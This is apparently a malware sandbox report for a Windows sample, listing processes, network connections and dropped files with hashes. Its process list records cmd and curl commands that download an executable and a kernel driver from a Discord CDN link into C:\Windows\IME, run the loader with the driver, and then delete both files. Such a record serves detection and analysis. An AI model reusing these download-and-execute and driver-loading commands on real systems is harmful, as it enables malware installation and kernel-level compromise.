C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffcf0946f8,0x7fffcf094708,0x7fffcf094718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 /prefetch:8
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2780 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 234.133.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 162.159.129.233:443 | tcp | |
| N/A | 162.159.129.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6471 | tcp | |
| N/A | 127.0.0.1:6472 | tcp | |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/5048-1-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
memory/5048-0-0x00007FFFED310000-0x00007FFFED312000-memory.dmp
memory/5048-2-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1386433ecc349475d39fb1e4f9e149a0 |
| SHA1 | f04f71ac77cb30f1d04fd16d42852322a8b2680f |
| SHA256 | a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc |
| SHA512 | fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e |
\??\pipe\LOCAL\crashpad_1500_FJTAQUEHBAOAXEIG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3a2e0c9dcc0cfd4506dfeb7380e9f8e1 |
| SHA1 | 46c09db0c959a43fe52e51d8ae0784f5790744d9 |
| SHA256 | e40c399298236afe95b2f6d012f920086222d0fbc114e7efa567218cb4229c24 |
| SHA512 | e987c6e7a2335e34a435abaacd4065e63bbdfa57c8ee6d56e3b8a0581f279a04375ae7c5b6b1c51068e9385d4d950231b4ef54d7eca00261ff78b33b3f2a255f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
| MD5 | 3631fb192c457a8b79e24be447f130c2 |
| SHA1 | d1e91dbc18a6cea9f3a70ba917b5d95cc64fb040 |
| SHA256 | 9729db4909f45672e4220a333f95ef8e5b8b1f17bdfb86fd5c3a6fd511d576c0 |
| SHA512 | 5cd5bf670f06f597322b03fac537c3082e8d0f13a81c47157353c10cbca34bc4a59a4b6ed35ae949b25250f175d423ea14a9f89f0bd9bd502ef3338328fb0415 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 574e914ae828133a9e2752b81f0fba77 |
| SHA1 | 040648b6303490ba437e36f9cea5d55cfa46b089 |
| SHA256 | 9277cf0627923c25e9d6a618e5aa8f68bd7919dcdade570496e4c6497cad754c |
| SHA512 | 0c1fb4d014a7962b08b257287685130dc73c17aadd0191d3e958c001b206c0ca005bb08cde84389a9738a753775e657742d63a0184f2e29b1f011da708936e9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd7a481992bb3c6c6c91230ebe41719a |
| SHA1 | 6f015adee0521bf04a0a1947d0b03b4c2e5602eb |
| SHA256 | 833dfd26a6d489a70511c3f8c7b2a3892b5d564f4a713bef70ce8109cf7ee0df |
| SHA512 | 79582828cbd9ab1183c5349f432421163d690f56f967eea3c6101a17becdd0e6b2e921229535bf231f1d258e7c3e3bb5c5dccd6523d9eb8d2f0e0909ff75174b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e664066e3aa135f185ed1c194b9fa1f8 |
| SHA1 | 358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5 |
| SHA256 | 86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617 |
| SHA512 | 58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e |
C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
| MD5 | 2a9323a6cbaff798e17c01be2f9b4b4e |
| SHA1 | f21da1dff74fa8a4fc700053352bb70d43d3d3ea |
| SHA256 | d89542d7df229de0447f183395234cf06adb621ac143567b1559e05d94d32d89 |
| SHA512 | 84eaaf174dfc83c7aac9182eb565ed10f70319bac3b25429b1d281b1a5d9787545d77dd924903845d2cd213d60ae016818e8fba3bbadd648b5fad38348285688 |
memory/5048-291-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0f6976ad6d5540f1f51f0df6839d48c9 |
| SHA1 | d5f7f1a5c8308766c23d4d07b443ceffae8b13be |
| SHA256 | a807bebf57431338d1d2e4ab939370aec25f17bf6fdb903335b69a2cffeb55f1 |
| SHA512 | 6799e3c695660c81b7bd30c91c97289a826967f75cec76e322b01c2105f825b5c0241038b7c35eed2dd09961bc83f96b965379a9e20f5d04b3abebbe643a4082 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 174d2805548b3042244d48d9917aecde |
| SHA1 | f01ed149e9dd669ec548e55ff9210e3693fe7ad9 |
| SHA256 | e72fe1eef49f172b5b6f2aa423d6e77d54a86abc3d86a3765084abeca55e5ef7 |
| SHA512 | 50fd27d8f07417d786b3300a0ae27c1b1802f5bb0d9fbf9c32260d63604f1a68cc698836922258bed984d4961442419bceb533c0bd7dc67c88e28d993db5e345 |